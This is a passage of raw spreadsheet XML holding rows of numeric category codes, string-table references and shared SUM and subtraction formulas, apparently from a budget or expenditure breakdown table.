        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AH1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AI1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AJ1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AK1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AL1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AM1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AN1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AO1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AP1255" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
    </row>
    <row r="1256" ht="18" customHeight="1" spans="1:42">
      <c r="A1256" s="10"/>
      <c r="B1256" s="10"/>
      <c r="C1256" s="28"/>
      <c r="D1256" s="10">
        <v>2220599</v>
      </c>
      <c r="E1256" s="16" t="s">
        <v>3977</v>
      </c>
      <c r="F1256" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1256" s="17"/>
      <c r="H1256" s="17"/>
      <c r="I1256" s="17"/>
      <c r="J1256" s="17"/>
      <c r="K1256" s="17"/>
      <c r="L1256" s="17"/>
      <c r="M1256" s="17"/>
      <c r="N1256" s="17"/>
      <c r="O1256" s="17"/>
      <c r="P1256" s="17"/>
      <c r="Q1256" s="17"/>
      <c r="R1256" s="17"/>
      <c r="S1256" s="17"/>
      <c r="T1256" s="17"/>
      <c r="U1256" s="17"/>
      <c r="V1256" s="17"/>
      <c r="W1256" s="17"/>
      <c r="X1256" s="17"/>
      <c r="Y1256" s="17"/>
      <c r="Z1256" s="17"/>
      <c r="AA1256" s="17"/>
      <c r="AB1256" s="17"/>
      <c r="AC1256" s="17"/>
      <c r="AD1256" s="17"/>
      <c r="AE1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AF1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AG1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AH1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AI1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AJ1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AK1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AL1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AM1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AN1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AO1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
      <c r="AP1256" s="17">
        <f t="shared" si="588"/>
        <v>0</v>
      </c>
    </row>
    <row r="1257" ht="18" customHeight="1" spans="1:42">
      <c r="A1257" s="10"/>
      <c r="B1257" s="10"/>
      <c r="C1257" s="28"/>
      <c r="D1257" s="10">
        <v>224</v>
      </c>
      <c r="E1257" s="11" t="s">
        <v>3978</v>
      </c>
      <c r="F1257" s="14">
        <f t="shared" si="579"/>
        <v>87</v>
      </c>
      <c r="G1257" s="12">
        <f t="shared" ref="G1257:R1257" si="589">G1258+G1270+G1276+G1282+G1290+G1303+G1307+G1311</f>
        <v>180</v>
      </c>
      <c r="H1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="I1257" s="12">
        <f t="shared" si="589"/>
        <v>14</v>
      </c>
      <c r="J1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="K1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="L1257" s="12">
        <f t="shared" si="589"/>
        <v>58</v>
      </c>
      <c r="M1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="N1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="O1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="P1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="Q1257" s="12">
        <f t="shared" si="589"/>
        <v>0</v>
      </c>
      <c r="R1257" s="12">
        <f t="shared" si="589"/>
        <v>15</v>
      </c>
      <c r="S1257" s="12">
        <v>165</v>
      </c>
      <c r="T1257" s="12">
        <v>0</v>
      </c>
      <c r="U1257" s="12">
        <v>0</v>
      </c>
      <c r="V1257" s="12">
        <v>0</v>
      </c>
      <c r="W1257" s="12">
        <v>0</v>
      </c>
      <c r="X1257" s="12">
        <v>41</v>
      </c>
      <c r="Y1257" s="12">
        <v>0</v>
      </c>
      <c r="Z1257" s="12">
        <v>0</v>
      </c>
      <c r="AA1257" s="12">
        <v>0</v>
      </c>
      <c r="AB1257" s="12">
        <v>0</v>
      </c>
      <c r="AC1257" s="12">
        <v>0</v>
      </c>
      <c r="AD1257" s="12">
        <v>15</v>
      </c>
      <c r="AE1257" s="12">
        <f t="shared" ref="AE1257:AP1257" si="590">AE1258+AE1270+AE1276+AE1282+AE1290+AE1303+AE1307+AE1311</f>
        <v>15</v>
      </c>
      <c r="AF1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AG1257" s="12">
        <f t="shared" si="590"/>
        <v>14</v>
      </c>
      <c r="AH1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AI1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AJ1257" s="12">
        <f t="shared" si="590"/>
        <v>17</v>
      </c>
      <c r="AK1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AL1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AM1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AN1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AO1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
      <c r="AP1257" s="12">
        <f t="shared" si="590"/>
        <v>0</v>
      </c>
    </row>
    <row r="1258" ht="18" customHeight="1" spans="1:42">
      <c r="A1258" s="10"/>
      <c r="B1258" s="10"/>
      <c r="C1258" s="28"/>
      <c r="D1258" s="10">
        <v>22401</v>
      </c>
      <c r="E1258" s="11" t="s">
        <v>3979</v>
      </c>
      <c r="F1258" s="14">
        <f t="shared" si="579"/>
        <v>2</v>
      </c>
      <c r="G1258" s="12">
        <f t="shared" ref="G1258:R1258" si="591">SUM(G1259:G1269)</f>
        <v>40</v>
      </c>
      <c r="H1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="I1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="J1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="K1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="L1258" s="12">
        <f t="shared" si="591"/>
        <v>2</v>
      </c>
      <c r="M1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="N1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="O1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="P1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="Q1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="R1258" s="12">
        <f t="shared" si="591"/>
        <v>0</v>
      </c>
      <c r="S1258" s="12">
        <v>36</v>
      </c>
      <c r="T1258" s="12">
        <v>0</v>
      </c>
      <c r="U1258" s="12">
        <v>0</v>
      </c>
      <c r="V1258" s="12">
        <v>0</v>
      </c>
      <c r="W1258" s="12">
        <v>0</v>
      </c>
      <c r="X1258" s="12">
        <v>2</v>
      </c>
      <c r="Y1258" s="12">
        <v>0</v>
      </c>
      <c r="Z1258" s="12">
        <v>0</v>
      </c>
      <c r="AA1258" s="12">
        <v>0</v>
      </c>
      <c r="AB1258" s="12">
        <v>0</v>
      </c>
      <c r="AC1258" s="12">
        <v>0</v>
      </c>
      <c r="AD1258" s="12">
        <v>0</v>
      </c>
      <c r="AE1258" s="12">
        <f t="shared" ref="AE1258:AP1258" si="592">SUM(AE1259:AE1269)</f>
        <v>4</v>
      </c>
      <c r="AF1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AG1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AH1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AI1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AJ1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AK1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AL1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AM1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AN1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AO1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
      <c r="AP1258" s="12">
        <f t="shared" si="592"/>
        <v>0</v>
      </c>
    </row>
    <row r="1259" ht="18" customHeight="1" spans="1:42">
      <c r="A1259" s="10"/>
      <c r="B1259" s="10"/>
      <c r="C1259" s="28"/>
      <c r="D1259" s="10">
        <v>2240101</v>
      </c>
      <c r="E1259" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1259" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1259" s="17"/>
      <c r="H1259" s="17"/>
      <c r="I1259" s="17"/>
      <c r="J1259" s="17"/>
      <c r="K1259" s="17"/>
      <c r="L1259" s="17"/>
      <c r="M1259" s="17"/>
      <c r="N1259" s="17"/>
      <c r="O1259" s="17"/>
      <c r="P1259" s="17"/>
      <c r="Q1259" s="17"/>
      <c r="R1259" s="17"/>
      <c r="S1259" s="17"/>
      <c r="T1259" s="17"/>
      <c r="U1259" s="17"/>
      <c r="V1259" s="17"/>
      <c r="W1259" s="17"/>
      <c r="X1259" s="17"/>
      <c r="Y1259" s="17"/>
      <c r="Z1259" s="17"/>
      <c r="AA1259" s="17"/>
      <c r="AB1259" s="17"/>
      <c r="AC1259" s="17"/>
      <c r="AD1259" s="17"/>
      <c r="AE1259" s="17">
        <f t="shared" ref="AE1259:AP1269" si="593">G1259-S1259</f>
        <v>0</v>
      </c>
      <c r="AF1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1259" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1260" ht="18" customHeight="1" spans="1:42">
      <c r="A1260" s="10"/>
      <c r="B1260" s="10"/>
      <c r="C1260" s="28"/>
      <c r="D1260" s="10">
        <v>2240102</v>
      </c>
      <c r="E1260" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1260" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1260" s="17"/>
      <c r="H1260" s="17"/>
      <c r="I1260" s="17"/>
      <c r="J1260" s="17"/>
      <c r="K1260" s="17"/>
      <c r="L1260" s="17"/>
      <c r="M1260" s="17"/>
      <c r="N1260" s="17"/>
      <c r="O1260" s="17"/>
      <c r="P1260" s="17"/>
      <c r="Q1260" s="17"/>
      <c r="R1260" s="17"/>
      <c r="S1260" s="17"/>
      <c r="T1260" s="17"/>
      <c r="U1260" s="17"/>
      <c r="V1260" s="17"/>
      <c r="W1260" s="17"/>
      <c r="X1260" s="17"/>
      <c r="Y1260" s="17"/>
      <c r="Z1260" s="17"/>
      <c r="AA1260" s="17"/>
      <c r="AB1260" s="17"/>
      <c r="AC1260" s="17"/>
      <c r="AD1260" s="17"/>
      <c r="AE1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AF1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1260" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1261" ht="18" customHeight="1" spans="1:42">
      <c r="A1261" s="10"/>
      <c r="B1261" s="10"/>
      <c r="C1261" s="28"/>
      <c r="D1261" s="10">
        <v>2240103</v>
      </c>
      <c r="E1261" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1261" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1261" s="17"/>
      <c r="H1261" s="17"/>
      <c r="I1261" s="17"/>
      <c r="J1261" s="17"/>
      <c r="K1261" s="17"/>
      <c r="L1261" s="17"/>
      <c r="M1261" s="17"/>
      <c r="N1261" s="17"/>
      <c r="O1261" s="17"/>
      <c r="P1261" s="17"/>
      <c r="Q1261" s="17"/>
      <c r="R1261" s="17"/>
      <c r="S1261" s="17"/>
      <c r="T1261" s="17"/>
      <c r="U1261" s="17"/>
      <c r="V1261" s="17"/>
      <c r="W1261" s="17"/>
      <c r="X1261" s="17"/>
      <c r="Y1261" s="17"/>
      <c r="Z1261" s="17"/>
      <c r="AA1261" s="17"/>
      <c r="AB1261" s="17"/>
      <c r="AC1261" s="17"/>
      <c r="AD1261" s="17"/>
      <c r="AE1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AF1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1261" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1262" ht="18" customHeight="1" spans="1:42">
      <c r="A1262" s="10"/>
      <c r="B1262" s="10"/>
      <c r="C1262" s="28"/>
      <c r="D1262" s="10">
        <v>2240104</v>
      </c>
      <c r="E1262" s="16" t="s">
        <v>3980</v>
      </c>
      <c r="F1262" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1262" s="17"/>
      <c r="H1262" s="17"/>
      <c r="I1262" s="17"/>
      <c r="J1262" s="17"/>
      <c r="K1262" s="17"/>
      <c r="L1262" s="17"/>
      <c r="M1262" s="17"/>
      <c r="N1262" s="17"/>
      <c r="O1262" s="17"/>
      <c r="P1262" s="17"/>
      <c r="Q1262" s="17"/>
      <c r="R1262" s="17"/>
      <c r="S1262" s="17"/>
      <c r="T1262" s="17"/>
      <c r="U1262" s="17"/>
      <c r="V1262" s="17"/>
      <c r="W1262" s="17"/>
      <c r="X1262" s="17"/>
      <c r="Y1262" s="17"/>
      <c r="Z1262" s="17"/>
      <c r="AA1262" s="17"/>
      <c r="AB1262" s="17"/>
      <c r="AC1262" s="17"/>
      <c r="AD1262" s="17"/>
      <c r="AE1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AF1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1262" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1263" ht="18" customHeight="1" spans="1:42">
      <c r="A1263" s="10"/>
      <c r="B1263" s="10"/>
      <c r="C1263" s="28"/>
      <c r="D1263" s="10">
        <v>2240105</v>
      </c>
      <c r="E1263" s="16" t="s">
        <v>3981</v>
      </c>
      <c r="F1263" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1263" s="17"/>
      <c r="H1263" s="17"/>
      <c r="I1263" s="17"/>
      <c r="J1263" s="17"/>
      <c r="K1263" s="17"/>
      <c r="L1263" s="17"/>
      <c r="M1263" s="17"/>
      <c r="N1263" s="17"/>
      <c r="O1263" s="17"/>
      <c r="P1263" s="17"/>
      <c r="Q1263" s="17"/>
      <c r="R1263" s="17"/>
      <c r="S1263" s="17"/>
      <c r="T1263" s="17"/>
      <c r="U1263" s="17"/>
      <c r="V1263" s="17"/>
      <c r="W1263" s="17"/>
      <c r="X1263" s="17"/>
      <c r="Y1263" s="17"/>
      <c r="Z1263" s="17"/>
      <c r="AA1263" s="17"/>
      <c r="AB1263" s="17"/>
      <c r="AC1263" s="17"/>
      <c r="AD1263" s="17"/>
      <c r="AE1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AF1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1263" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1264" ht="18" customHeight="1" spans="1:42">
      <c r="A1264" s="10"/>
      <c r="B1264" s="10"/>
      <c r="C1264" s="28"/>
      <c r="D1264" s="10">
        <v>2240106</v>
      </c>
      <c r="E1264" s="16" t="s">
        <v>3982</v>
      </c>
      <c r="F1264" s="14">
        <f t="shared" si="579"/>
        <v>2</v>
      </c>
      <c r="G1264" s="17">
        <v>40</v>
      </c>
      <c r="H1264" s="17"/>
      <c r="I1264" s="17"/>
      <c r="J1264" s="17"/>
      <c r="K1264" s="17"/>
      <c r="L1264" s="17">
        <v>2</v>
      </c>
      <c r="M1264" s="17"/>
      <c r="N1264" s="17"/>
      <c r="O1264" s="17"/>
      <c r="P1264" s="17"/>
      <c r="Q1264" s="17"/>
      <c r="R1264" s="17"/>
      <c r="S1264" s="17">
        <v>36</v>
      </c>
      <c r="T1264" s="17"/>
      <c r="U1264" s="17"/>
      <c r="V1264" s="17"/>
      <c r="W1264" s="17"/>
      <c r="X1264" s="17">
        <v>2</v>
      </c>
      <c r="Y1264" s="17"/>
      <c r="Z1264" s="17"/>
      <c r="AA1264" s="17"/>
      <c r="AB1264" s="17"/>
      <c r="AC1264" s="17"/>
      <c r="AD1264" s="17"/>
      <c r="AE1264" s="17">
        <f t="shared" si="593"/>
        <v>4</v>
      </c>
      <c r="AF1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1264" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1265" ht="18" customHeight="1" spans="1:42">
      <c r="A1265" s="10"/>
      <c r="B1265" s="10"/>
      <c r="C1265" s="28"/>
      <c r="D1265" s="10">
        <v>2240107</v>
      </c>
      <c r="E1265" s="16" t="s">
        <v>3983</v>
      </c>
      <c r="F1265" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1265" s="17"/>
      <c r="H1265" s="17"/>
      <c r="I1265" s="17"/>
      <c r="J1265" s="17"/>
      <c r="K1265" s="17"/>
      <c r="L1265" s="17"/>
      <c r="M1265" s="17"/>
      <c r="N1265" s="17"/>
      <c r="O1265" s="17"/>
      <c r="P1265" s="17"/>
      <c r="Q1265" s="17"/>
      <c r="R1265" s="17"/>
      <c r="S1265" s="17"/>
      <c r="T1265" s="17"/>
      <c r="U1265" s="17"/>
      <c r="V1265" s="17"/>
      <c r="W1265" s="17"/>
      <c r="X1265" s="17"/>
      <c r="Y1265" s="17"/>
      <c r="Z1265" s="17"/>
      <c r="AA1265" s="17"/>
      <c r="AB1265" s="17"/>
      <c r="AC1265" s="17"/>
      <c r="AD1265" s="17"/>
      <c r="AE1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AF1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1265" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1266" ht="18" customHeight="1" spans="1:42">
      <c r="A1266" s="10"/>
      <c r="B1266" s="10"/>
      <c r="C1266" s="28"/>
      <c r="D1266" s="10">
        <v>2240108</v>
      </c>
      <c r="E1266" s="16" t="s">
        <v>3984</v>
      </c>
      <c r="F1266" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1266" s="17"/>
      <c r="H1266" s="17"/>
      <c r="I1266" s="17"/>
      <c r="J1266" s="17"/>
      <c r="K1266" s="17"/>
      <c r="L1266" s="17"/>
      <c r="M1266" s="17"/>
      <c r="N1266" s="17"/>
      <c r="O1266" s="17"/>
      <c r="P1266" s="17"/>
      <c r="Q1266" s="17"/>
      <c r="R1266" s="17"/>
      <c r="S1266" s="17"/>
      <c r="T1266" s="17"/>
      <c r="U1266" s="17"/>
      <c r="V1266" s="17"/>
      <c r="W1266" s="17"/>
      <c r="X1266" s="17"/>
      <c r="Y1266" s="17"/>
      <c r="Z1266" s="17"/>
      <c r="AA1266" s="17"/>
      <c r="AB1266" s="17"/>
      <c r="AC1266" s="17"/>
      <c r="AD1266" s="17"/>
      <c r="AE1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AF1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1266" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1267" ht="18" customHeight="1" spans="1:42">
      <c r="A1267" s="10"/>
      <c r="B1267" s="10"/>
      <c r="C1267" s="28"/>
      <c r="D1267" s="10">
        <v>2240109</v>
      </c>
      <c r="E1267" s="16" t="s">
        <v>3985</v>
      </c>
      <c r="F1267" s="14">
        <f t="shared" si="579"/>
        <v>0</v>
      </c>
      <c r="G1267" s="17"/>
      <c r="H1267" s="17"/>
      <c r="I1267" s="17"/>
      <c r="J1267" s="17"/>
      <c r="K1267" s="17"/>
      <c r="L1267" s="17"/>
      <c r="M1267" s="17"/>
      <c r="N1267" s="17"/>
      <c r="O1267" s="17"/>
      <c r="P1267" s="17"/>
      <c r="Q1267" s="17"/>
      <c r="R1267" s="17"/>
      <c r="S1267" s="17"/>
      <c r="T1267" s="17"/>
      <c r="U1267" s="17"/>
      <c r="V1267" s="17"/>
      <c r="W1267" s="17"/>
      <c r="X1267" s="17"/>
      <c r="Y1267" s="17"/>
      <c r="Z1267" s="17"/>
      <c r="AA1267" s="17"/>
      <c r="AB1267" s="17"/>
      <c r="AC1267" s="17"/>
      <c r="AD1267" s="17"/>
      <c r="AE1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AF1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AG1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AH1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AI1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AJ1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AK1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AL1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AM1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AN1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AO1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
      <c r="AP1267" s="17">
        <f t="shared" si="593"/>
        <v>0</v>
      </c>
    </row>
    <row r="1268" ht="18" customHeight="1" spans="1:42">
      <c r="A1268" s="10"/>
      <c r="B1268" s="10"/>
      <c r="C1268" s="28"/>
      <c r="D1268" s="10">
        <v>2240150</v>
      </c>
      <c r="E1268" s="16" t="s">
        <v>2539</v>
